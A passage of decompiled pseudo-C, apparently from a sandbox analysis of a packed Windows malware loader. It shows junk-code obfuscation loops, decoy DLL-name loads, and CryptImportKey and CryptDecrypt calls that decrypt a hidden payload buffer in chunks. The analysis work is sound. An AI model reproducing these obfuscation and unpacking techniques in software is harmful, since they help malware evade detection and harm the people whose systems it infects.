                                                							_v88 = 0;
                                                							_t2071 = _v88 - 0xc;
                                                							while(_v88 < 0xc) {
                                                								_v88 = _v88 + 1;
                                                								_push(_v88);
                                                								_t1906 =  *0x4fef4c; // 0x43c1493c
                                                								_t2009 =  *0x4feecc; // 0xd26bafe0
                                                								_t1771 = E004FEF2C; // 0xa1d900
                                                								 *0x4feee0 = E004EE798(_t1771, 0, _t1906, _t2009, _t2071);
                                                							}
                                                						}
                                                						_v32 = 0;
                                                						do {
                                                							_v76 = _v40 + _v48;
                                                							_v32 = _v32 + 1;
                                                						} while (_v32 != 0x10);
                                                						 *0x4feedc = E004FEF50 * 0x9f;
                                                						E00404658(_v124, 0, 0x80, _v116);
                                                						_v124 =  *_a4 + _v12 - 0x84;
                                                						_v84 = 0;
                                                						while(_v84 < 3) {
                                                							_v84 = _v84 + 1;
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_v36 = _v56 * 0xf9;
                                                							_t1766 =  *0x4feee0; // 0x747938b
                                                							 *0x4feee8 = _t1766;
                                                							_v48 = 0;
                                                							while(_v48 < 0xd) {
                                                								_v48 = _v48 + 1;
                                                								asm("fild dword [ebp-0x28]");
                                                								_v60 = E004048D8();
                                                							}
                                                						}
                                                						_v80 = 0;
                                                						_v68 = 0;
                                                						do {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_v68 = _v68 + 1;
                                                						} while (_v68 != 0xf);
                                                						_v88 = _v52 + 0xb5;
                                                						_t1221 =  *0x4fef40; // 0x3c79b5d4
                                                						E004FEF34 = _t1221 *  *0x4fef14;
                                                						_t1223 =  *0x4feee8; // 0xdcd0f434
                                                						_t2081 = _t1223 - E004FEF10 -  *0x4fef3c; // 0x1cb932a9
                                                						if(_t2081 == 0) {
                                                							_t1760 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feecc = _t1760 + 4;
                                                						}
                                                						if(_v72 + _v44 != _v44) {
                                                							_t1227 =  *0x4feed8; // 0x1cb9338e
                                                							__eflags = _t1227 -  *0x4fef18 - E004FEF34; // 0xc3c34ef0
                                                							if(__eflags != 0) {
                                                								_t1229 =  *0x4fef28; // 0x3c79b5d4
                                                								_t1230 = _t1229 - 0x40;
                                                								__eflags = _t1230;
                                                								E004FEF0C = _t1230;
                                                							} else {
                                                								_t1756 = E004FEF10; // 0x1cb931c0
                                                								 *0x4feed8 = _t1756 *  *0x4feee8;
                                                							}
                                                						} else {
                                                							_t1758 =  *0x4fef18; // 0xbc3e19a
                                                							 *0x4fef14 = _t1758 + 0xaf;
                                                						}
                                                						E00404658(_v124, 0, 4,  &_v136);
                                                						asm("fild dword [ebp-0x34]");
                                                						_v44 = E004048CC();
                                                						_v52 = _v84 - _v32;
                                                						_v60 = _v40 + 2;
                                                						_t1237 = E004FEF2C; // 0xa1d900
                                                						 *0x4fef14 = _t1237;
                                                						_t1238 =  *0x4feef4; // 0xb52124ca
                                                						E004FEF20 = _t1238;
                                                						_v72 = _v92 - _v80;
                                                						_v112 = 0x80;
                                                						_t1241 =  *0x4feed8; // 0x1cb9338e
                                                						 *0x4feed8 = E0040489C(_t1241);
                                                						_v40 = 0;
                                                						_t2084 = _v40 - 7;
                                                						if(_v40 < 7) {
                                                							_v40 = _v40 + 1;
                                                							_v52 = _v44 - 0x92;
                                                							 *0x4feee8 = E004F0EBC( &_v40, 0x4feee8, _t2084);
                                                						}
                                                						_t1244 =  *0x4feefc; // 0x4b08dcc7
                                                						 *0x4fef30 = _t1244;
                                                						_v88 = E004F0EBC( &E004FEF38,  &_v36, _t2084);
                                                						_push(_v72);
                                                						_t1248 =  *0x4fef14; // 0xb52124ca
                                                						_v48 = E004EE798(_t1248, 0, _v56, _v64, _t2084);
                                                						_v92 = _v72 * 0xef;
                                                						_t1254 = CryptDecrypt(_v108, 0, 0xffffffff, 0, _v116,  &_v112); // executed
                                                						if(_t1254 == 0) {
                                                							L248:
                                                							_v88 = 0;
                                                							E00406CF4( &_v24, _v24);
                                                							_t1258 =  *0x4fee98; // 0x0
                                                							_v172 = _t1258;
                                                							__eflags = _v172;
                                                							if(_v172 != 0) {
                                                								_t1296 = _v172 - 4;
                                                								__eflags = _t1296;
                                                								_v172 =  *_t1296;
                                                							}
                                                							__eflags = _v172 - 0x11;
                                                							if(__eflags <= 0) {
                                                								_t1260 = _v92 + 0x76;
                                                								__eflags = _t1260;
                                                								_v180 = _t1260;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v60 = E004048CC();
                                                							} else {
                                                								_t1292 = E004FEF34; // 0xc3c34ef0
                                                								_push(_t1292);
                                                								_t1884 = E004FEED0; // 0xc3c34ef0
                                                								_t1953 =  *0x4fef18; // 0xbc3e19a
                                                								_t1293 =  *0x4fef48; // 0xc3c34ef0
                                                								_v56 = E004EE798(_t1293, 0, _t1884, _t1953, __eflags);
                                                							}
                                                							_t1262 = E004FEF50; // 0xa3b3f6c0
                                                							 *0x4fef28 = _t1262;
                                                							_v84 = _v80 - _v36;
                                                							_v32 = _v52 + _v72;
                                                							_v40 = _v44 + _v76;
                                                							_t1269 =  *0x4feec8; // 0x0
                                                							_v176 = _t1269;
                                                							__eflags = _v176;
                                                							if(_v176 != 0) {
                                                								_t1290 = _v176 - 4;
                                                								__eflags = _t1290;
                                                								_v176 =  *_t1290;
                                                							}
                                                							__eflags = _v176 - 0xbd;
                                                							if(_v176 <= 0xbd) {
                                                								_t1270 =  *0x4feea0; // 0xa1d900
                                                								 *0x4fef14 = _t1270;
                                                							} else {
                                                								_t1288 =  *0x4fef44; // 0x38993
                                                								E004FEF00 = _t1288;
                                                							}
                                                							_pop(_t1949);
                                                							 *[fs:eax] = _t1949;
                                                							_push(E004F2C93);
                                                							E00406CF4( &_v24, L"api-ms-win-core-util-l1-1-0.dll");
                                                							E00406CF4( &_v24, L"dmintf.dll");
                                                							_v48 = _v36 * 0x72;
                                                							_t1277 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feefc = E0040489C(_t1277);
                                                							_t1279 =  *0x4feeec; // 0xb52124f2
                                                							 *0x4fef04 = _t1279;
                                                							_t1280 =  *0x4feefc; // 0x4b08dcc7
                                                							__eflags = _t1280 -  *0x4fef04; // 0x43c14963
                                                							if(__eflags > 0) {
                                                								__eflags = 0x93;
                                                								_v68 = 0x93 - _v56;
                                                							}
                                                							_t1282 = _v40 * _v72;
                                                							__eflags = _t1282;
                                                							_v80 = _t1282;
                                                							_t1283 =  *0x4fef30; // 0xa1d816
                                                							 *0x4fef44 = _t1283;
                                                							return E004044D0(_v116);
                                                						} else {
                                                							_v180 = _v40 + 0xe9;
                                                							asm("fild dword [ebp-0xb0]");
                                                							_v68 = E004048CC();
                                                							_v72 = _v52 * _v32;
                                                							_v80 = _v56;
                                                							_v88 = 0;
                                                							do {
                                                								E00407678(_v24, 0, 1,  &_v24);
                                                								_v76 = _v48;
                                                								_v88 = _v88 + 1;
                                                							} while (_v88 != 0xc);
                                                							_v44 = 0;
                                                							while(_v44 < 3) {
                                                								_v44 = _v44 + 1;
                                                								 *0x4fef4c =  *0x4feef0 * 0x44;
                                                							}
                                                							_t1314 = CryptImportKey(_v96, _v116, _v112, 0, 0,  &_v100); // executed
                                                							if(_t1314 == 0) {
                                                								_t1956 =  *0x4fef24; // 0x0
                                                								_t1316 = E00407774(L"CNB_0309.DLL", 1, _t1956);
                                                								__eflags = _t1316 - 0xee;
                                                								if(_t1316 != 0xee) {
                                                									__eflags = 0xf4;
                                                									_v36 = 0xf4 - _v68;
                                                								}
                                                								_v48 = _v76 - 0x32;
                                                								_t1319 = E004FEF00; // 0xa3b3f6c0
                                                								E004FEF00 = E0040489C(_t1319);
                                                								_t1321 = E004FEF34; // 0xc3c34ef0
                                                								E004FEF0C = _t1321;
                                                								_t1322 = E004FEF0C; // 0xb52124bf
                                                								__eflags = _t1322 - E004FEF00; // 0xa3b3f6c0
                                                								if(__eflags < 0) {
                                                									_t1332 = _v84 * _v88;
                                                									__eflags = _t1332;
                                                									_v72 = _t1332;
                                                								}
                                                								_t1323 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef40 = _t1323;
                                                								_v180 = _v60 + 0x82;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v52 = E004048CC();
                                                								_t1328 = E00407774(L"WininetPlugin.dll", 1, _v24);
                                                								__eflags = _t1328 - 0xe3;
                                                								if(_t1328 != 0xe3) {
                                                									_t1330 = _v92 - _v44;
                                                									__eflags = _t1330;
                                                									_v40 = _t1330;
                                                								}
                                                								goto L248;
                                                							} else {
                                                								_v68 = _v76;
                                                								_v44 = _v32 + 0x43;
                                                								_v64 = _v56 - _v36;
                                                								_v48 = 0;
                                                								_t2091 = _v48 - 0xb;
                                                								while(_v48 < 0xb) {
                                                									_v48 = _v48 + 1;
                                                									_push(_v60);
                                                									_t1749 =  *0x4feee0; // 0x747938b
                                                									 *0x4fef40 = E004EE798(_t1749, 0, _v72, _v72, _t2091);
                                                								}
                                                								_v60 = _v52 * _v80;
                                                								_v72 = _v40 * 0x66;
                                                								_push(_t2022);
                                                								_push(0x4f2a6c);
                                                								_push( *[fs:eax]);
                                                								 *[fs:eax] = _t2024;
                                                								_v120 = E004044B4(_v136 + 0x100000);
                                                								_v48 = _v64 * 0x2c;
                                                								_t1349 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEF00 = _t1349;
                                                								_t1350 =  *0x4fef04; // 0x43c14963
                                                								 *0x4fef04 = E0040489C(_t1350);
                                                								_t1352 = E004FEF00; // 0xa3b3f6c0
                                                								_t2093 = _t1352 -  *0x4fef04; // 0x43c14963
                                                								if(_t2093 < 0) {
                                                									asm("fild dword [ebp-0x38]");
                                                									_v72 = E004048D8();
                                                									_v88 = _v36 * 0xda;
                                                									_v92 = 0x6d - _v68;
                                                									_v40 = _v76 + 0xd4;
                                                								}
                                                								_t1353 =  *0x4feefc; // 0x4b08dcc7
                                                								E004FEF20 = _t1353 - 0xeb;
                                                								_t1355 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4fef44 = _t1355 + 4;
                                                								_t1357 =  *0x4fef28; // 0x3c79b5d4
                                                								 *0x4feed8 = _t1357 +  *0x4feee8;
                                                								_t1359 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feee0 = _t1359;
                                                								_push(_t2022);
                                                								_push(0x4f29a2);
                                                								_push( *[fs:eax]);
                                                								 *[fs:eax] = _t2024;
                                                								_v72 = _v64 * 0x7a;
                                                								_v80 = 0;
                                                								do {
                                                									_v88 = 0;
                                                									do {
                                                										E00407678(_v24, 0, 1,  &_v24);
                                                										_v88 = _v88 + 1;
                                                									} while (_v88 != 4);
                                                									_t1367 =  *0x4feef4; // 0xb52124ca
                                                									 *0x4feeec = _t1367;
                                                									_t1368 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4feef4 = _t1368;
                                                									_v80 = _v80 + 1;
                                                								} while (_v80 != 0xf);
                                                								_v92 = 0xf7 - _v68;
                                                								_v48 = 0;
                                                								while(_v48 < 0xf) {
                                                									_v48 = _v48 + 1;
                                                									_v76 = 0;
                                                									while(_v76 < 0) {
                                                										_v76 = _v76 + 1;
                                                										_t1741 =  *0x4feecc; // 0xd26bafe0
                                                										 *0x4feeec = _t1741;
                                                									}
                                                									_v32 = _v44 * 0xae;
                                                								}
                                                								E00407678(_v24, 0, 1,  &_v28);
                                                								_t1375 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feecc = _t1375 - 0xc8;
                                                								asm("cdq");
                                                								_v132 =  *_a4 - 0x84;
                                                								_v128 = 1;
                                                								_v72 = _v44 - _v40;
                                                								_t1382 =  *0x4fef14; // 0xb52124ca
                                                								 *0x4fef3c = _t1382;
                                                								_t1383 =  *0x4fef44; // 0x38993
                                                								 *0x4fef44 = E0040489C(_t1383);
                                                								_t1385 =  *0x4fef3c; // 0x1cb932a9
                                                								_t2103 = _t1385 -  *0x4fef44; // 0x38993
                                                								if(_t2103 >= 0) {
                                                									_t1386 =  *0x4feecc; // 0xd26bafe0
                                                									 *0x4feecc = E0040489C(_t1386);
                                                								} else {
                                                									_t1732 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEED0 = _t1732;
                                                									_v48 = _v68;
                                                									_t1734 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4feef0 = _t1734;
                                                									_v52 = 0;
                                                									while(_v52 < 0xa) {
                                                										_v52 = _v52 + 1;
                                                										_v180 = _v80 + 0x9c;
                                                										asm("fild dword [ebp-0xb0]");
                                                										_v88 = E004048CC();
                                                									}
                                                								}
                                                								_t1388 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feee8 = _t1388;
                                                								_v156 = _v28;
                                                								if(_v156 != 0) {
                                                									_v156 =  *((intOrPtr*)(_v156 - 4));
                                                								}
                                                								if(_v156 == 0x11) {
                                                									_v60 = 0xa7 - _v64;
                                                								}
                                                								 *_a4 = 0;
                                                								_v52 = (_v88 << 6) - _v88;
                                                								_v60 = _v44 + 0x7d;
                                                								_v64 = 0;
                                                								while(_v64 < 0xb) {
                                                									_v64 = _v64 + 1;
                                                									_v40 = 0;
                                                									_t2111 = _v40 - 5;
                                                									while(_v40 < 5) {
                                                										_v40 = _v40 + 1;
                                                										_t1724 = E004FEF50; // 0xa3b3f6c0
                                                										_push(_t1724);
                                                										_t2004 = E004FEF38; // 0xc3c34fdc
                                                										E004EE798(_v48, 0, _v92, _t2004, _t2111);
                                                									}
                                                								}
                                                								_v80 = _v92 + 4;
                                                								_v68 = _v48 - 0xa;
                                                								_t1401 =  *0x4fef30; // 0xa1d816
                                                								 *0x4feea0 = _t1401 +  *0x4feef0;
                                                								_v140 = 0;
                                                								_v144 = 0;
                                                								_v72 = _v48;
                                                								if(0x2e - _v64 >= 0x2b) {
                                                									__eflags = _v76 - _v52;
                                                									if(_v76 <= _v52) {
                                                										_v68 = _v76 * _v92;
                                                										_t1411 =  *0x4feea0; // 0xa1d900
                                                										_t1412 = _t1411 + 0x77;
                                                										__eflags = _t1412;
                                                										 *0x4fef48 = _t1412;
                                                									} else {
                                                										__eflags = 0;
                                                										_v60 = 0;
                                                										do {
                                                											E00407678(_v24, 0, 1,  &_v24);
                                                											_v60 = _v60 + 1;
                                                											__eflags = _v60 - 0xd;
                                                										} while (_v60 != 0xd);
                                                									}
                                                									 *0x4feefc = E004FEF0C * 0x72;
                                                									_t1414 =  *0x4fef4c; // 0x43c1493c
                                                									_t1415 = _t1414 - 8;
                                                									__eflags = _t1415;
                                                									E004FEF2C = _t1415;
                                                									_t1416 =  *0x4fef04; // 0x43c14963
                                                									E004FEF34 = _t1416;
                                                								} else {
                                                									_v88 = 0;
                                                									while(_v88 < 0xe) {
                                                										_v88 = _v88 + 1;
                                                										_v44 = 3 - _v80;
                                                									}
                                                									_v56 = _v32 * 0x6e;
                                                								}
                                                								_t1417 =  *0x4feee8; // 0xdcd0f434
                                                								E004FEF50 = _t1417;
                                                								_t1418 = E004FEF34; // 0xc3c34ef0
                                                								 *0x4feecc = _t1418;
                                                								_t1419 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feed8 = E0040489C(_t1419);
                                                								_t1421 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feefc = _t1421 + 4;
                                                								L176:
                                                								while(1) {
                                                									if(_v128 != 0) {
                                                										if(__eflags > 0) {
                                                											goto L129;
                                                										}
                                                									} else {
                                                										_t2118 = _v132;
                                                										if(_v132 > 0) {
                                                											L129:
                                                											__eflags = _v128;
                                                											if(__eflags != 0) {
                                                												if(__eflags <= 0) {
                                                													goto L134;
                                                												} else {
                                                													goto L133;
                                                												}
                                                											} else {
                                                												__eflags = _v132 - 0x100000;
                                                												if(_v132 <= 0x100000) {
                                                													L134:
                                                													_v60 = 0xeb - _v68;
                                                													_v180 = _v88 + 4;
                                                													asm("fild dword [ebp-0xb0]");
                                                													_v36 = E004048D8();
                                                													__eflags = _v76 - _v44 - _v56 - _v44;
                                                													if(_v76 - _v44 <= _v56 - _v44) {
                                                														_t1430 =  *0x4fef44; // 0x38993
                                                														_t1431 = _t1430 + _t1430;
                                                														__eflags = _t1431;
                                                														E004FEF0C = _t1431 + _t1431 * 4;
                                                													} else {
                                                														_v56 = 0;
                                                														__eflags = _v56 - 1;
                                                														while(_v56 < 1) {
                                                															_v56 = _v56 + 1;
                                                															_v44 = _v64 - 0x7d;
                                                															__eflags = _v56 - 1;
                                                														}
                                                														_v48 = _v32 + 0x9a;
                                                														 *0x4feea0 =  *0x4feeec * 0x75;
                                                													}
                                                													_t1433 = E004FEF2C; // 0xa1d900
                                                													E004FEF2C = _t1433;
                                                													_t1434 = E004FEF10; // 0x1cb931c0
                                                													_t1435 = _t1434 - 0x9f;
                                                													__eflags = _t1435;
                                                													 *0x4fef48 = _t1435;
                                                													asm("fild dword [0x4fef3c]");
                                                													 *0x4feee8 = E004048CC();
                                                													_v112 = _v132;
                                                												} else {
                                                													L133:
                                                													_t1664 = E004FEED0; // 0xc3c34ef0
                                                													 *0x4feef0 = _t1664;
                                                													_t1665 = E004FEF34; // 0xc3c34ef0
                                                													 *0x4feefc = _t1665;
                                                													_v60 = _v44 - 0xc3;
                                                													_t1668 =  *0x4fef30; // 0xa1d816
                                                													 *0x4fef14 = _t1668;
                                                													_v72 = _v80 + _v92;
                                                													_v64 = _v36 - 0xc7;
                                                													_v112 = _v136 + 0x100000;
                                                												}
                                                											}
                                                											_v84 = 0;
                                                											__eflags = _v84 - 6;
                                                											while(_v84 < 6) {
                                                												_v84 = _v84 + 1;
                                                												_v36 = _v48 + 4;
                                                												__eflags = _v84 - 6;
                                                											}
                                                											_t1440 = E00407774(L"davclnt.dll", 1, _v24);
                                                											__eflags = _t1440 - 0xee;
                                                											if(_t1440 < 0xee) {
                                                												_t1706 = _v72 * 0x5b;
                                                												__eflags = _t1706;
                                                												_v64 = _t1706;
                                                											}
                                                											_t1441 = E004FEF34; // 0xc3c34ef0
                                                											E004FEF34 = E0040489C(_t1441);
                                                											_v80 = _v56 * 0x5d;
                                                											_v92 = 0;
                                                											__eflags = _v92 - 4;
                                                											while(_v92 < 4) {
                                                												_v92 = _v92 + 1;
                                                												_v68 = _v40 - 0x8e;
                                                												__eflags = _v92 - 4;
                                                											}
                                                											_t1445 = E004FEF2C; // 0xa1d900
                                                											 *0x4fef3c = _t1445 + 0xb4;
                                                											_push(_v128);
                                                											_push(_v132);
                                                											 *_t2024 =  *_t2024 - _v112;
                                                											asm("sbb [esp+0x4], edx");
                                                											_pop(_t1449);
                                                											_v132 = _t1449;
                                                											_v128 = 0;
                                                											E00404658(_v12 + _v144, 0, _v112, _v120);
                                                											_v64 = _v76 * _v68;
                                                											__eflags = 0;
                                                											_v72 = 0;
                                                											do {
                                                												_t1455 = E004FEF38; // 0xc3c34fdc
                                                												__eflags = _t1455 -  *0x4feef0 - 0xe5;
                                                												if(_t1455 -  *0x4feef0 < 0xe5) {
                                                													_t1973 =  *0x4fef24; // 0x0
                                                													_t1697 = E00407774(L"Microsoft.WSMan.Management.ni.dll", 1, _t1973);
                                                													__eflags = _t1697 - 0x6d;
                                                													if(_t1697 == 0x6d) {
                                                														_t1699 = _v60 + 4;
                                                														__eflags = _t1699;
                                                														_v180 = _t1699;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v88 = E004048D8();
                                                													} else {
                                                														_v180 = _v84 + 4;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v48 = E004048D8();
                                                													}
                                                												}
                                                												_t1457 =  *0x4feed8; // 0x1cb9338e
                                                												__eflags = _t1457 -  *0x4fef28 - 0xa4;
                                                												if(_t1457 -  *0x4fef28 < 0xa4) {
                                                													_t1695 = _v36 + 0xa8;
                                                													__eflags = _t1695;
                                                													_v32 = _t1695;
                                                												}
                                                												_t1459 =  *0x4fef3c; // 0x1cb932a9
                                                												E004FEF34 = _t1459 + E004FEF0C;
                                                												_v72 = _v72 + 1;
                                                												__eflags = _v72 - 4;
                                                											} while (_v72 != 4);
                                                											_t1461 =  *0x4fef28; // 0x3c79b5d4
                                                											 *0x4fef4c = _t1461;
                                                											_t1462 =  *0x4feea0; // 0xa1d900
                                                											__eflags = _t1462 -  *0x4fef18 - 0x34;
                                                											if(_t1462 -  *0x4fef18 >= 0x34) {
                                                												_t1464 = E004FEF20; // 0x6e687a1a
                                                												E004FEF20 = E0040489C(_t1464);
                                                												 *0x4fef40 =  *0x4fef40 + 0xbe;
                                                												__eflags =  *0x4fef40;
                                                											} else {
                                                												_t1693 = E004FEF00; // 0xa3b3f6c0
                                                												 *0x4feefc = _t1693;
                                                											}
                                                											_t1466 =  *0x4fef3c; // 0x1cb932a9
                                                											 *0x4feee8 = _t1466 -  *0x4fef14;
                                                											_t1468 =  *0x4feef0; // 0x44632301
                                                											 *0x4feef0 = _t1468;
                                                											_v144 = _v144 + _v112;
                                                											_t1473 = CryptDecrypt(_v100, 0, 0xffffffff, 0, _v120,  &_v112);
                                                											__eflags = _t1473;
                                                											if(_t1473 == 0) {
                                                												_v44 = _v84 + _v76;
                                                												_v52 = _v40 + _v36;
                                                												_t1478 = E004FEF0C; // 0xb52124bf
                                                												E004FEF0C = _t1478;
                                                												__eflags = 0x43 -  *0x4feed8 - 0x45;
                                                												if(0x43 -  *0x4feed8 >= 0x45) {
                                                													_t1481 =  *0x4feec8; // 0x0
                                                													_v160 = _t1481;
                                                													__eflags = _v160;
                                                													if(_v160 != 0) {
                                                														_t1635 = _v160 - 4;
                                                														__eflags = _t1635;
                                                														_v160 =  *_t1635;
                                                													}
                                                													__eflags = _v160 - 0xed;
                                                													if(_v160 > 0xed) {
                                                														_t1632 = _v88 + 0xf4;
                                                														__eflags = _t1632;
                                                														_v180 = _t1632;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v56 = E004048CC();
                                                													}
                                                												} else {
                                                													_v72 = _v48 + 4;
                                                												}
                                                												_v68 = 0;
                                                												__eflags = _v68 - 5;
                                                												while(_v68 < 5) {
                                                													_v68 = _v68 + 1;
                                                													_v32 = 0;
                                                													_t1629 = E004FEED0; // 0xc3c34ef0
                                                													E004FEED0 = E0040489C(_t1629);
                                                													__eflags = _v68 - 5;
                                                												}
                                                												E004FEF2C =  *0x4feefc * 0xf1;
                                                											} else {
                                                												_v36 = _v84 * _v60;
                                                												_v180 = _v80 + 4;
                                                												asm("fild dword [ebp-0xb0]");
                                                												_v44 = E004048D8();
                                                												_v56 = _v52 - 0x80;
                                                												_t1646 =  *0x4fef18; // 0xbc3e19a
                                                												 *0x4fef18 = E0040489C(_t1646);
                                                												_v68 = _v88 * _v72;
                                                												_v48 = 0;
                                                												__eflags = _v48 - 9;
                                                												while(_v48 < 9) {
                                                													_v48 = _v48 + 1;
                                                													_t1691 = E004FEED0; // 0xc3c34ef0
                                                													E004FEED0 = E0040489C(_t1691);
                                                													__eflags = _v48 - 9;
                                                												}
                                                												E00404658(_v120, 0, _v112,  *_v16 + _v140);
                                                												 *_a4 =  *_a4 + _v112;
                                                												_v84 = 0;
                                                												__eflags = _v84 - 0xa;
                                                												while(__eflags < 0) {
                                                													_v84 = _v84 + 1;
                                                													E00407678(_v24, 0, 1,  &_v24);
                                                													_t1678 =  *0x4fef28; // 0x3c79b5d4
                                                													 *0x4feee0 = _t1678;
                                                													_v48 = _v36 - 0x9a;
                                                													_v56 = _v52 + 4;
                                                													_t1683 =  *0x4fef18; // 0xbc3e19a
                                                													 *0x4fef18 = E0040489C(_t1683);
                                                													_t1685 =  *0x4feeec; // 0xb52124f2
                                                													 *0x4fef28 = _t1685;
                                                													_t1686 =  *0x4fef18; // 0xbc3e19a
                                                													__eflags = _t1686 -  *0x4fef28; // 0x3c79b5d4
                                                													if(__eflags >= 0) {
                                                														_t1687 = _v68 * 0x32;
                                                														__eflags = _t1687;
                                                														_v60 = _t1687;
                                                													} else {
                                                														_v92 = 0;
                                                														_v40 = _v64 * _v44;
                                                													}
                                                													__eflags = _v84 - 0xa;
                                                												}
                                                												_t1654 =  *0x4feecc; // 0xd26bafe0
                                                												_v180 = _t1654 + 0x85;
                                                												asm("fild dword [ebp-0xb0]");
                                                												 *0x4feef4 = E004048CC();
                                                												_t1657 = E004FEF10; // 0x1cb931c0
                                                												E004FEF20 = _t1657;
                                                												_t1658 =  *0x4feedc; // 0xbc3e19a
                                                												 *0x4fef40 = _t1658 +  *0x4feea0;
                                                												asm("fild dword [0x4fef20]");
                                                												 *0x4feedc = E004048CC();
                                                												_t1661 =  *0x4feeec; // 0xb52124f2
                                                												E004FEF00 = _t1661 - 0x14;
                                                												_v140 = _v140 + _v112;
                                                												continue;
                                                											}
                                                										} else {
                                                										}
                                                									}
                                                									_t1484 =  *0x4feef4; // 0xb52124ca
                                                									 *0x4feef4 = E0040489C(_t1484);
                                                									E004F0EBC(0x4fef44,  &E004FEF10, _t2118);
                                                									_v60 = _v48 - _v88;
                                                									_t1975 =  *0x4feed4; // 0x0
                                                									if(E00407774(L"dxmasf.dll", 1, _t1975) != 0x83) {
                                                										_v80 = 0;
                                                										while(_v80 < 9) {
                                                											_v80 = _v80 + 1;
                                                											E00406CF4( &_v24, L"WcnEapPeerProxy.dll");
                                                										}
                                                										_t1625 =  *0x4feecc; // 0xd26bafe0
                                                										 *0x4feeec = _t1625;
                                                									}
                                                									_v56 = _v44;
                                                									_v64 = 0;
                                                									do {
                                                										_t1494 =  *0x4fef30; // 0xa1d816
                                                										_t1976 =  *0x4feeec; // 0xb52124f2
                                                										if(_t1494 - E004FEF2C > _t1976 - E004FEF2C) {
                                                											_v84 = 0;
                                                											_t2124 = _v84 - 0xd;
                                                											while(_v84 < 0xd) {
                                                												_v84 = _v84 + 1;
                                                												_t1621 =  *0x4fef48; // 0xc3c34ef0
                                                												_push(_t1621);
                                                												_t1993 =  *0x4fef40; // 0x3c79b5d4
                                                												_v52 = E004EE798(_v44, 0, _v92, _t1993, _t2124);
                                                											}
                                                										}
                                                										_v64 = _v64 + 1;
                                                									} while (_v64 != 9);
                                                									if(_v128 == 0 && _v132 == 0) {
                                                										_v17 = 1;
                                                										_v64 = _v80 + 0xa0;
                                                										_v72 = _v48 - _v36;
                                                										_v68 = 0;
                                                										while(_v68 < 7) {
                                                											_v68 = _v68 + 1;
                                                											E00406CF4( &_v24, _v24);
                                                											asm("fild dword [ebp-0x38]");
                                                											_v40 = E004048D8();
                                                											_v76 = 0;
                                                											do {
                                                												_v84 = _v92 + 4;
                                                												_v76 = _v76 + 1;
                                                											} while (_v76 != 5);
                                                										}
                                                										_v44 = 0;
                                                										while(_v44 < 0xc) {
                                                											_v44 = _v44 + 1;
                                                											_t1613 = E004FEED0; // 0xc3c34ef0
                                                											 *0x4feed8 = _t1613;
                                                										}
                                                										_t1603 =  *0x4feef0; // 0x44632301
                                                										_t1990 =  *0x4feee0; // 0x747938b
                                                										if(_t1603 -  *0x4feeec <= _t1990 -  *0x4feeec) {
                                                											_t1605 =  *0x4fef28; // 0x3c79b5d4
                                                											_t1606 = _t1605 + E004FEF00;
                                                											__eflags = _t1606;
                                                											 *0x4feed8 = _t1606;
                                                										} else {
                                                											_t1611 =  *0x4feea0; // 0xa1d900
                                                											 *0x4fef30 = _t1611 +  *0x4fef28;
                                                										}
                                                										_t1607 =  *0x4fef28; // 0x3c79b5d4
                                                										 *0x4feef4 = _t1607;
                                                										_t1608 =  *0x4feef4; // 0xb52124ca
                                                										_t2136 = _t1608 -  *0x4feed8; // 0x1cb9338e
                                                										if(_t2136 > 0) {
                                                											_t1609 = E004FEF00; // 0xa3b3f6c0
                                                											E004FEF34 = _t1609 -  *0x4fef48;
                                                										}
                                                									}
                                                									_v56 = _v84 + 4;
                                                									_t1498 = E004FEF10; // 0x1cb931c0
                                                									E004FEF10 = E0040489C(_t1498);
                                                									_t1500 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4fef14 = _t1500;
                                                									_t1501 = E004FEF10; // 0x1cb931c0
                                                									_t2138 = _t1501 -  *0x4fef14; // 0xb52124ca
                                                									if(_t2138 >= 0) {
                                                										_v40 = 0;
                                                										__eflags = _v40 - 7;
                                                										while(_v40 < 7) {
                                                											_v40 = _v40 + 1;
                                                											_t1585 =  *0x4fef28; // 0x3c79b5d4
                                                											E004FEED0 = _t1585;
                                                											__eflags = _v40 - 7;
                                                										}
                                                										E00406CF4( &_v24, _v28);
                                                										asm("fild dword [ebp-0x40]");
                                                										_v52 = E004048CC();
                                                										_t1507 = _v48 - 0xe7;
                                                										__eflags = _t1507;
                                                										_v64 = _t1507;
                                                									} else {
                                                										_t1586 = E004FEF38; // 0xc3c34fdc
                                                										E004FEF38 = E0040489C(_t1586);
                                                										_t1588 = E004FEF38; // 0xc3c34fdc
                                                										_t2139 = _t1588 -  *0x4fef14; // 0xb52124ca
                                                										if(_t2139 < 0) {
                                                											_t1592 =  *0x4fef4c; // 0x43c1493c
                                                											 *0x4fef4c = E0040489C(_t1592);
                                                											_t1594 = E004FEF38; // 0xc3c34fdc
                                                											_t2140 = _t1594 -  *0x4fef4c; // 0x43c1493c
                                                											if(_t2140 > 0) {
                                                												_v80 = E004F0EBC( &_v80, 0x4feecc, _t2140);
                                                											}
                                                										}
                                                										_v180 = _v32 + 0xeb;
                                                										asm("fild dword [ebp-0xb0]");
                                                										_v60 = E004048CC();
                                                									}
                                                									_v44 = 0;
                                                									_t1509 =  *0x4fef14; // 0xb52124ca
                                                									 *0x4feea0 = _t1509;
                                                									_t1510 =  *0x4feedc; // 0xbc3e19a
                                                									 *0x4feef0 = _t1510 + E004FEF10;
                                                									_t1512 =  *0x4feed8; // 0x1cb9338e
                                                									 *0x4fef28 = _t1512 * E004FEF20;
                                                									_t1514 = E004FEF50; // 0xa3b3f6c0
                                                									_t1894 =  *0x4feefc; // 0x4b08dcc7
